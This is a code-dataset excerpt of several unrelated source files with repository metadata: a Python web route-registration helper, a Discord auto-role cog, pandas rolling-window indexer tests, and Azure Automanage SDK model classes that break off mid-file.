往 app中的 UrlDispatcher(继承AbstractRouter)添加映射关系
_resources:映射信息对象(Resource)
_named_resources: 映射信息名称
:param app: 需要注册映射信息的服务器对象
:param fn: 映射方法(方法中包含 __method__ 和 __route__ 两个字段)
:return:
"""
method = getattr(fn, '__method__', None)
path = getattr(fn, '__route__', None)
if path is None or method is None:
raise ValueError('@get or @post not defined in %s.' % str(fn))
if not asyncio.iscoroutinefunction(fn) and not inspect.isgeneratorfunction(fn):
fn = asyncio.coroutine(fn)
logging.info(
'add route %s %s => %s(%s)' % (method, path, fn.__name__, ', '.join(inspect.signature(fn).parameters.keys())))
# 方法名,请求路径 ,处理方法
app.router.add_route(method, path, RequestHandler(app, fn))
def add_routes(app, *module_name):
"""
引入指定模块中的handle,取出模块中的可调用方法判断是否包含 __method__ 和 __route__属性
:param app:
:param module_name:
:return:
"""
for module in module_name:
if not _RE_HANDLE_NAME.match(module):
continue
n = module.rfind('.')
if n == (-1):
# __import__一般用作python解释器来导入包 相当于from module import xxx
# globals() 返回当前域内的global variables ;locals() 返回当前域内的locals variables
mod = __import__(module, globals(), locals())
else:
name = module[n + 1:]
mod = getattr(__import__(module[:n], globals(), locals(), [name]), name)
for attr in dir(mod):
if attr.startswith('_'):
continue
fn = getattr(mod, attr)
if callable(fn):
method = getattr(fn, '__method__', None)
path = getattr(fn, '__route__', None)
if method and path:
add_route(app, fn)
| 30.688462
| 118
| 0.577265
|
4a0212bd7afea26839a4d034679cd7fd8d24b780
| 1,253
|
py
|
Python
|
cogs/newcomers.py
|
lifehackerhansol/Sycamore
|
39b4574cd8224c2b4927992cadf22e4c4c368bd1
|
[
"0BSD"
] | null | null | null |
cogs/newcomers.py
|
lifehackerhansol/Sycamore
|
39b4574cd8224c2b4927992cadf22e4c4c368bd1
|
[
"0BSD"
] | 4
|
2021-05-25T06:48:00.000Z
|
2022-02-03T18:41:57.000Z
|
cogs/newcomers.py
|
lifehackerhansol/Sycamore
|
39b4574cd8224c2b4927992cadf22e4c4c368bd1
|
[
"0BSD"
] | null | null | null |
#
# ISC License
#
# Copyright (C) 2021 DS-Homebrew
# Copyright (C) 2021-present lifehackerhansol
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
import discord
from discord.ext import commands
from settings import auto_role
class Newcomers(commands.Cog):
"""
Automatic roles!
"""
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_member_join(self, member):
role = discord.utils.get(member.guild.roles, name=auto_role)
await member.add_roles(role)
def setup(bot):
bot.add_cog(Newcomers(bot))
| 29.833333
| 74
| 0.742219
|
4a0212e890d3ad287e083c26840ed54beef36e8a
| 8,157
|
py
|
Python
|
.venv/lib/python3.8/site-packages/pandas/tests/window/test_base_indexer.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 115
|
2020-06-18T15:00:58.000Z
|
2022-03-02T10:13:19.000Z
|
.venv/lib/python3.8/site-packages/pandas/tests/window/test_base_indexer.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 21
|
2021-04-13T01:17:40.000Z
|
2022-03-11T16:06:50.000Z
|
.venv/lib/python3.8/site-packages/pandas/tests/window/test_base_indexer.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 60
|
2020-07-22T14:53:10.000Z
|
2022-03-23T10:17:59.000Z
|
import numpy as np
import pytest
from pandas import DataFrame, Series, date_range
import pandas._testing as tm
from pandas.api.indexers import BaseIndexer, FixedForwardWindowIndexer
from pandas.core.window.indexers import ExpandingIndexer, VariableOffsetWindowIndexer
from pandas.tseries.offsets import BusinessDay
def test_bad_get_window_bounds_signature():
class BadIndexer(BaseIndexer):
def get_window_bounds(self):
return None
indexer = BadIndexer()
with pytest.raises(ValueError, match="BadIndexer does not implement"):
Series(range(5)).rolling(indexer)
def test_expanding_indexer():
s = Series(range(10))
indexer = ExpandingIndexer()
result = s.rolling(indexer).mean()
expected = s.expanding().mean()
tm.assert_series_equal(result, expected)
def test_indexer_constructor_arg():
# Example found in computation.rst
use_expanding = [True, False, True, False, True]
df = DataFrame({"values": range(5)})
class CustomIndexer(BaseIndexer):
def get_window_bounds(self, num_values, min_periods, center, closed):
start = np.empty(num_values, dtype=np.int64)
end = np.empty(num_values, dtype=np.int64)
for i in range(num_values):
if self.use_expanding[i]:
start[i] = 0
end[i] = i + 1
else:
start[i] = i
end[i] = i + self.window_size
return start, end
indexer = CustomIndexer(window_size=1, use_expanding=use_expanding)
result = df.rolling(indexer).sum()
expected = DataFrame({"values": [0.0, 1.0, 3.0, 3.0, 10.0]})
tm.assert_frame_equal(result, expected)
def test_indexer_accepts_rolling_args():
df = DataFrame({"values": range(5)})
class CustomIndexer(BaseIndexer):
def get_window_bounds(self, num_values, min_periods, center, closed):
start = np.empty(num_values, dtype=np.int64)
end = np.empty(num_values, dtype=np.int64)
for i in range(num_values):
if center and min_periods == 1 and closed == "both" and i == 2:
start[i] = 0
end[i] = num_values
else:
start[i] = i
end[i] = i + self.window_size
return start, end
indexer = CustomIndexer(window_size=1)
result = df.rolling(indexer, center=True, min_periods=1, closed="both").sum()
expected = DataFrame({"values": [0.0, 1.0, 10.0, 3.0, 4.0]})
tm.assert_frame_equal(result, expected)
def test_win_type_not_implemented():
class CustomIndexer(BaseIndexer):
def get_window_bounds(self, num_values, min_periods, center, closed):
return np.array([0, 1]), np.array([1, 2])
df = DataFrame({"values": range(2)})
indexer = CustomIndexer()
with pytest.raises(NotImplementedError, match="BaseIndexer subclasses not"):
df.rolling(indexer, win_type="boxcar")
@pytest.mark.parametrize("constructor", [Series, DataFrame])
@pytest.mark.parametrize(
"func,np_func,expected,np_kwargs",
[
("count", len, [3.0, 3.0, 3.0, 3.0, 3.0, 3.0, 3.0, 3.0, 2.0, np.nan], {},),
("min", np.min, [0.0, 1.0, 2.0, 3.0, 4.0, 6.0, 6.0, 7.0, 8.0, np.nan], {},),
(
"max",
np.max,
[2.0, 3.0, 4.0, 100.0, 100.0, 100.0, 8.0, 9.0, 9.0, np.nan],
{},
),
(
"std",
np.std,
[
1.0,
1.0,
1.0,
55.71654452,
54.85739087,
53.9845657,
1.0,
1.0,
0.70710678,
np.nan,
],
{"ddof": 1},
),
(
"var",
np.var,
[
1.0,
1.0,
1.0,
3104.333333,
3009.333333,
2914.333333,
1.0,
1.0,
0.500000,
np.nan,
],
{"ddof": 1},
),
(
"median",
np.median,
[1.0, 2.0, 3.0, 4.0, 6.0, 7.0, 7.0, 8.0, 8.5, np.nan],
{},
),
],
)
def test_rolling_forward_window(constructor, func, np_func, expected, np_kwargs):
# GH 32865
values = np.arange(10)
values[5] = 100.0
indexer = FixedForwardWindowIndexer(window_size=3)
match = "Forward-looking windows can't have center=True"
with pytest.raises(ValueError, match=match):
rolling = constructor(values).rolling(window=indexer, center=True)
result = getattr(rolling, func)()
match = "Forward-looking windows don't support setting the closed argument"
with pytest.raises(ValueError, match=match):
rolling = constructor(values).rolling(window=indexer, closed="right")
result = getattr(rolling, func)()
rolling = constructor(values).rolling(window=indexer, min_periods=2)
result = getattr(rolling, func)()
# Check that the function output matches the explicitly provided array
expected = constructor(expected)
tm.assert_equal(result, expected)
# Check that the rolling function output matches applying an alternative
# function to the rolling window object
expected2 = constructor(rolling.apply(lambda x: np_func(x, **np_kwargs)))
tm.assert_equal(result, expected2)
# Check that the function output matches applying an alternative function
# if min_periods isn't specified
rolling3 = constructor(values).rolling(window=indexer)
result3 = getattr(rolling3, func)()
expected3 = constructor(rolling3.apply(lambda x: np_func(x, **np_kwargs)))
tm.assert_equal(result3, expected3)
@pytest.mark.parametrize("constructor", [Series, DataFrame])
def test_rolling_forward_skewness(constructor):
values = np.arange(10)
values[5] = 100.0
indexer = FixedForwardWindowIndexer(window_size=5)
rolling = constructor(values).rolling(window=indexer, min_periods=3)
result = rolling.skew()
expected = constructor(
[
0.0,
2.232396,
2.229508,
2.228340,
2.229091,
2.231989,
0.0,
0.0,
np.nan,
np.nan,
]
)
tm.assert_equal(result, expected)
@pytest.mark.parametrize(
"func,expected",
[
("cov", [2.0, 2.0, 2.0, 97.0, 2.0, -93.0, 2.0, 2.0, np.nan, np.nan],),
(
"corr",
[
1.0,
1.0,
1.0,
0.8704775290207161,
0.018229084250926637,
-0.861357304646493,
1.0,
1.0,
np.nan,
np.nan,
],
),
],
)
def test_rolling_forward_cov_corr(func, expected):
values1 = np.arange(10).reshape(-1, 1)
values2 = values1 * 2
values1[5, 0] = 100
values = np.concatenate([values1, values2], axis=1)
indexer = FixedForwardWindowIndexer(window_size=3)
rolling = DataFrame(values).rolling(window=indexer, min_periods=3)
# We are interested in checking only pairwise covariance / correlation
result = getattr(rolling, func)().loc[(slice(None), 1), 0]
result = result.reset_index(drop=True)
expected = Series(expected)
expected.name = result.name
tm.assert_equal(result, expected)
@pytest.mark.parametrize(
"closed,expected_data",
[
["right", [0.0, 1.0, 2.0, 3.0, 7.0, 12.0, 6.0, 7.0, 8.0, 9.0]],
["left", [0.0, 0.0, 1.0, 2.0, 5.0, 9.0, 5.0, 6.0, 7.0, 8.0]],
],
)
def test_non_fixed_variable_window_indexer(closed, expected_data):
index = date_range("2020", periods=10)
df = DataFrame(range(10), index=index)
offset = BusinessDay(1)
indexer = VariableOffsetWindowIndexer(index=index, offset=offset)
result = df.rolling(indexer, closed=closed).sum()
expected = DataFrame(expected_data, index=index)
tm.assert_frame_equal(result, expected)
| 31.863281
| 85
| 0.572147
|
4a02132654d4953ef71138b04fa109e55841e150
| 26,904
|
py
|
Python
|
sdk/automanage/azure-mgmt-automanage/azure/mgmt/automanage/models/_models.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 2,728
|
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/automanage/azure-mgmt-automanage/azure/mgmt/automanage/models/_models.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 17,773
|
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/automanage/azure-mgmt-automanage/azure/mgmt/automanage/models/_models.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1,916
|
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class Resource(msrest.serialization.Model):
"""Resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource Id for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. Ex- Microsoft.Compute/virtualMachines or
Microsoft.Storage/storageAccounts.
:vartype type: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Resource, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
class TrackedResource(Resource):
"""The resource model definition for a ARM tracked top level resource.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource Id for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. Ex- Microsoft.Compute/virtualMachines or
Microsoft.Storage/storageAccounts.
:vartype type: str
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives.
:type location: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'location': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(TrackedResource, self).__init__(**kwargs)
self.tags = kwargs.get('tags', None)
self.location = kwargs['location']
class Account(TrackedResource):
"""Definition of the Automanage account.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource Id for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. Ex- Microsoft.Compute/virtualMachines or
Microsoft.Storage/storageAccounts.
:vartype type: str
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives.
:type location: str
:param identity: The identity of the Automanage account.
:type identity: ~automanage_client.models.AccountIdentity
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'location': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'AccountIdentity'},
}
def __init__(
self,
**kwargs
):
super(Account, self).__init__(**kwargs)
self.identity = kwargs.get('identity', None)
class AccountIdentity(msrest.serialization.Model):
"""Identity for the Automanage account.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar principal_id: The principal id of Automanage account identity.
:vartype principal_id: str
:ivar tenant_id: The tenant id associated with the Automanage account.
:vartype tenant_id: str
:param type: The type of identity used for the Automanage account. Currently, the only
supported type is 'SystemAssigned', which implicitly creates an identity. Possible values
include: "SystemAssigned", "None".
:type type: str or ~automanage_client.models.ResourceIdentityType
"""
_validation = {
'principal_id': {'readonly': True},
'tenant_id': {'readonly': True},
}
_attribute_map = {
'principal_id': {'key': 'principalId', 'type': 'str'},
'tenant_id': {'key': 'tenantId', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AccountIdentity, self).__init__(**kwargs)
self.principal_id = None
self.tenant_id = None
self.type = kwargs.get('type', None)
class AccountList(msrest.serialization.Model):
"""The response of the list Account operation.
:param value: Result of the list Account operation.
:type value: list[~automanage_client.models.Account]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[Account]'},
}
def __init__(
self,
**kwargs
):
super(AccountList, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class UpdateResource(msrest.serialization.Model):
"""Represents an update resource.
:param tags: A set of tags. The tags of the resource.
:type tags: dict[str, str]
"""
_attribute_map = {
'tags': {'key': 'tags', 'type': '{str}'},
}
def __init__(
self,
**kwargs
):
super(UpdateResource, self).__init__(**kwargs)
self.tags = kwargs.get('tags', None)
class AccountUpdate(UpdateResource):
"""Definition of the Automanage account.
:param tags: A set of tags. The tags of the resource.
:type tags: dict[str, str]
:param identity: The identity of the Automanage account.
:type identity: ~automanage_client.models.AccountIdentity
"""
_attribute_map = {
'tags': {'key': 'tags', 'type': '{str}'},
'identity': {'key': 'identity', 'type': 'AccountIdentity'},
}
def __init__(
self,
**kwargs
):
super(AccountUpdate, self).__init__(**kwargs)
self.identity = kwargs.get('identity', None)
class ConfigurationProfileAssignment(Resource):
"""Configuration profile assignment is an association between a VM and automanage profile configuration.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource Id for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. Ex- Microsoft.Compute/virtualMachines or
Microsoft.Storage/storageAccounts.
:vartype type: str
:param properties: Properties of the configuration profile assignment.
:type properties: ~automanage_client.models.ConfigurationProfileAssignmentProperties
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'ConfigurationProfileAssignmentProperties'},
}
def __init__(
self,
**kwargs
):
super(ConfigurationProfileAssignment, self).__init__(**kwargs)
self.properties = kwargs.get('properties', None)
class ConfigurationProfileAssignmentCompliance(msrest.serialization.Model):
"""The compliance status for the configuration profile assignment.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar update_status: The state of compliance, which only appears in the response. Possible
values include: "Succeeded", "Failed", "Created".
:vartype update_status: str or ~automanage_client.models.UpdateStatus
"""
_validation = {
'update_status': {'readonly': True},
}
_attribute_map = {
'update_status': {'key': 'updateStatus', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ConfigurationProfileAssignmentCompliance, self).__init__(**kwargs)
self.update_status = None
class ConfigurationProfileAssignmentList(msrest.serialization.Model):
"""The response of the list configuration profile assignment operation.
:param value: Result of the list configuration profile assignment operation.
:type value: list[~automanage_client.models.ConfigurationProfileAssignment]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[ConfigurationProfileAssignment]'},
}
def __init__(
self,
**kwargs
):
super(ConfigurationProfileAssignmentList, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class ConfigurationProfileAssignmentProperties(msrest.serialization.Model):
"""Automanage configuration profile assignment properties.
Variables are only populated by the server, and will be ignored when sending a request.
:param configuration_profile: A value indicating configuration profile. Possible values
include: "Azure virtual machine best practices – Dev/Test", "Azure virtual machine best
practices – Production".
:type configuration_profile: str or ~automanage_client.models.ConfigurationProfile
:param target_id: The target VM resource URI.
:type target_id: str
:param account_id: The Automanage account ARM Resource URI.
:type account_id: str
:param configuration_profile_preference_id: The configuration profile custom preferences ARM
resource URI.
:type configuration_profile_preference_id: str
:ivar provisioning_status: The state of onboarding, which only appears in the response.
Possible values include: "Succeeded", "Failed", "Created".
:vartype provisioning_status: str or ~automanage_client.models.ProvisioningStatus
:param compliance: The configuration setting for the configuration profile.
:type compliance: ~automanage_client.models.ConfigurationProfileAssignmentCompliance
"""
_validation = {
'provisioning_status': {'readonly': True},
}
_attribute_map = {
'configuration_profile': {'key': 'configurationProfile', 'type': 'str'},
'target_id': {'key': 'targetId', 'type': 'str'},
'account_id': {'key': 'accountId', 'type': 'str'},
'configuration_profile_preference_id': {'key': 'configurationProfilePreferenceId', 'type': 'str'},
'provisioning_status': {'key': 'provisioningStatus', 'type': 'str'},
'compliance': {'key': 'compliance', 'type': 'ConfigurationProfileAssignmentCompliance'},
}
def __init__(
self,
**kwargs
):
super(ConfigurationProfileAssignmentProperties, self).__init__(**kwargs)
self.configuration_profile = kwargs.get('configuration_profile', None)
self.target_id = kwargs.get('target_id', None)
self.account_id = kwargs.get('account_id', None)
self.configuration_profile_preference_id = kwargs.get('configuration_profile_preference_id', None)
self.provisioning_status = None
self.compliance = kwargs.get('compliance', None)
class ConfigurationProfilePreference(TrackedResource):
"""Definition of the configuration profile preference.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource Id for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. Ex- Microsoft.Compute/virtualMachines or
Microsoft.Storage/storageAccounts.
:vartype type: str
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives.
:type location: str
:param properties: Properties of the configuration profile preference.
:type properties: ~automanage_client.models.ConfigurationProfilePreferenceProperties
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'location': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'ConfigurationProfilePreferenceProperties'},
}
def __init__(
self,
**kwargs
):
super(ConfigurationProfilePreference, self).__init__(**kwargs)
self.properties = kwargs.get('properties', None)
class ConfigurationProfilePreferenceAntiMalware(msrest.serialization.Model):
"""Automanage configuration profile Antimalware preferences.
:param enable_real_time_protection: Enables or disables Real Time Protection. Possible values
include: "True", "False".
:type enable_real_time_protection: str or ~automanage_client.models.EnableRealTimeProtection
:param exclusions: Extensions, Paths and Processes that must be excluded from scan.
:type exclusions: object
:param run_scheduled_scan: Enables or disables a periodic scan for antimalware. Possible values
include: "True", "False".
:type run_scheduled_scan: str or ~automanage_client.models.RunScheduledScan
:param scan_type: Type of scheduled scan. Possible values include: "Quick", "Full".
:type scan_type: str or ~automanage_client.models.ScanType
:param scan_day: Schedule scan settings day.
:type scan_day: str
:param scan_time_in_minutes: Schedule scan settings time.
:type scan_time_in_minutes: str
"""
_attribute_map = {
'enable_real_time_protection': {'key': 'enableRealTimeProtection', 'type': 'str'},
'exclusions': {'key': 'exclusions', 'type': 'object'},
'run_scheduled_scan': {'key': 'runScheduledScan', 'type': 'str'},
'scan_type': {'key': 'scanType', 'type': 'str'},
'scan_day': {'key': 'scanDay', 'type': 'str'},
'scan_time_in_minutes': {'key': 'scanTimeInMinutes', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ConfigurationProfilePreferenceAntiMalware, self).__init__(**kwargs)
self.enable_real_time_protection = kwargs.get('enable_real_time_protection', None)
self.exclusions = kwargs.get('exclusions', None)
self.run_scheduled_scan = kwargs.get('run_scheduled_scan', None)
self.scan_type = kwargs.get('scan_type', None)
self.scan_day = kwargs.get('scan_day', None)
self.scan_time_in_minutes = kwargs.get('scan_time_in_minutes', None)
class ConfigurationProfilePreferenceList(msrest.serialization.Model):
"""The response of the list ConfigurationProfilePreference operation.
:param value: Result of the list ConfigurationProfilePreference operation.
:type value: list[~automanage_client.models.ConfigurationProfilePreference]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[ConfigurationProfilePreference]'},
}
def __init__(
self,
**kwargs
):
super(ConfigurationProfilePreferenceList, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class ConfigurationProfilePreferenceProperties(msrest.serialization.Model):
"""Automanage configuration profile preference properties.
:param vm_backup: The custom preferences for Azure VM Backup.
:type vm_backup: ~automanage_client.models.ConfigurationProfilePreferenceVmBackup
:param anti_malware: The custom preferences for Azure Antimalware.
:type anti_malware: ~automanage_client.models.ConfigurationProfilePreferenceAntiMalware
"""
_attribute_map = {
'vm_backup': {'key': 'vmBackup', 'type': 'ConfigurationProfilePreferenceVmBackup'},
'anti_malware': {'key': 'antiMalware', 'type': 'ConfigurationProfilePreferenceAntiMalware'},
}
def __init__(
self,
**kwargs
):
super(ConfigurationProfilePreferenceProperties, self).__init__(**kwargs)
self.vm_backup = kwargs.get('vm_backup', None)
self.anti_malware = kwargs.get('anti_malware', None)
class ConfigurationProfilePreferenceUpdate(UpdateResource):
"""Definition of the configuration profile preference.
:param tags: A set of tags. The tags of the resource.
:type tags: dict[str, str]
:param properties: Properties of the configuration profile preference.
:type properties: ~automanage_client.models.ConfigurationProfilePreferenceProperties
"""
_attribute_map = {
'tags': {'key': 'tags', 'type': '{str}'},
'properties': {'key': 'properties', 'type': 'ConfigurationProfilePreferenceProperties'},
}
def __init__(
self,
**kwargs
):
super(ConfigurationProfilePreferenceUpdate, self).__init__(**kwargs)
self.properties = kwargs.get('properties', None)
class ConfigurationProfilePreferenceVmBackup(msrest.serialization.Model):
"""Automanage configuration profile VM Backup preferences.
:param time_zone: TimeZone optional input as string. For example: Pacific Standard Time.
:type time_zone: str
:param instant_rp_retention_range_in_days: Instant RP retention policy range in days.
:type instant_rp_retention_range_in_days: int
:param retention_policy: Retention policy with the details on backup copy retention ranges.
:type retention_policy: str
:param schedule_policy: Backup schedule specified as part of backup policy.
:type schedule_policy: str
"""
_attribute_map = {
'time_zone': {'key': 'timeZone', 'type': 'str'},
'instant_rp_retention_range_in_days': {'key': 'instantRpRetentionRangeInDays', 'type': 'int'},
'retention_policy': {'key': 'retentionPolicy', 'type': 'str'},
'schedule_policy': {'key': 'schedulePolicy', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ConfigurationProfilePreferenceVmBackup, self).__init__(**kwargs)
self.time_zone = kwargs.get('time_zone', None)
self.instant_rp_retention_range_in_days = kwargs.get('instant_rp_retention_range_in_days', None)
self.retention_policy = kwargs.get('retention_policy', None)
self.schedule_policy = kwargs.get('schedule_policy', None)
class ErrorAdditionalInfo(msrest.serialization.Model):
"""The resource management error additional info.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar type: The additional info type.
:vartype type: str
:ivar info: The additional info.
:vartype info: object
"""
_validation = {
'type': {'readonly': True},
'info': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'info': {'key': 'info', 'type': 'object'},
}
def __init__(
self,
**kwargs
):
super(ErrorAdditionalInfo, self).__init__(**kwargs)
self.type = None
self.info = None
class ErrorResponse(msrest.serialization.Model):
"""The resource management error response.
:param error: The error object.
:type error: ~automanage_client.models.ErrorResponseError
"""
_attribute_map = {
'error': {'key': 'error', 'type': 'ErrorResponseError'},
}
def __init__(
self,
**kwargs
):
super(ErrorResponse, self).__init__(**kwargs)
self.error = kwargs.get('error', None)
class ErrorResponseError(msrest.serialization.Model):
"""The error object.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar code: The error code.
:vartype code: str
:ivar message: The error message.
:vartype message: str
:ivar target: The error target.
:vartype target: str
:ivar details: The error details.
:vartype details: list[~automanage_client.models.ErrorResponse]
:ivar additional_info: The error additional info.
:vartype additional_info: list[~automanage_client.models.ErrorAdditionalInfo]
"""
_validation = {
'code': {'readonly': True},
'message': {'readonly': True},
'target': {'readonly': True},
'details': {'readonly': True},
'additional_info': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
'details': {'key': 'details', 'type': '[ErrorResponse]'},
'additional_info': {'key': 'additionalInfo', 'type': '[ErrorAdditionalInfo]'},
}
def __init__(
self,
**kwargs
):
super(ErrorResponseError, self).__init__(**kwargs)
self.code = None
self.message = None
self.target = None
self.details = None
self.additional_info = None
class Operation(msrest.serialization.Model):
"""Automanage REST API operation.
:param name: Operation name: For ex.
providers/Microsoft.Automanage/configurationProfileAssignments/write or read.
:type name: str
:param is_data_action: Indicates whether the operation is a data action.
:type is_data_action: str
:param display: Provider, Resource, Operation and description values.
:type display: ~automanage_client.models.OperationDisplay
:param status_code: Service provider: Microsoft.Automanage.
:type status_code: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'is_data_action': {'key': 'isDataAction', 'type': 'str'},
'display': {'key': 'display', 'type': 'OperationDisplay'},
'status_code': {'key': 'properties.statusCode', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Operation, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.is_data_action = kwargs.get('is_data_action', None)
self.display = kwargs.get('display', None)
self.status_code = kwargs.get('status_code', None)
class OperationDisplay(msrest.serialization.Model):
"""Provider, Resource, Operation and description values.
:param provider: Service provider: Microsoft.Automanage.
:type provider: str
:param resource: Resource on which the operation is performed: For ex.
:type resource: str
:param operation: Operation type: Read, write, delete, etc.
:type operation: str
:param description: Description about operation.
:type description: str
"""
_attribute_map = {
'provider': {'key': 'provider', 'type': 'str'},
'resource': {'key': 'resource', 'type': 'str'},
'operation': {'key': 'operation', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(OperationDisplay, self).__init__(**kwargs)
self.provider = kwargs.get('provider', None)
self.resource = kwargs.get('resource', None)
self.operation = kwargs.get('operation', None)
self.description = kwargs.get('description', None)
class OperationList(msrest.serialization.Model):
"""The response model for the list of Automanage operations.
:param value: List of Automanage operations supported by the Automanage resource provider.
:type value: list[~automanage_client.models.Operation]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[Operation]'},
}
def __init__(
self,
**kwargs
):
super(OperationList, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class ProxyResource(Resource):
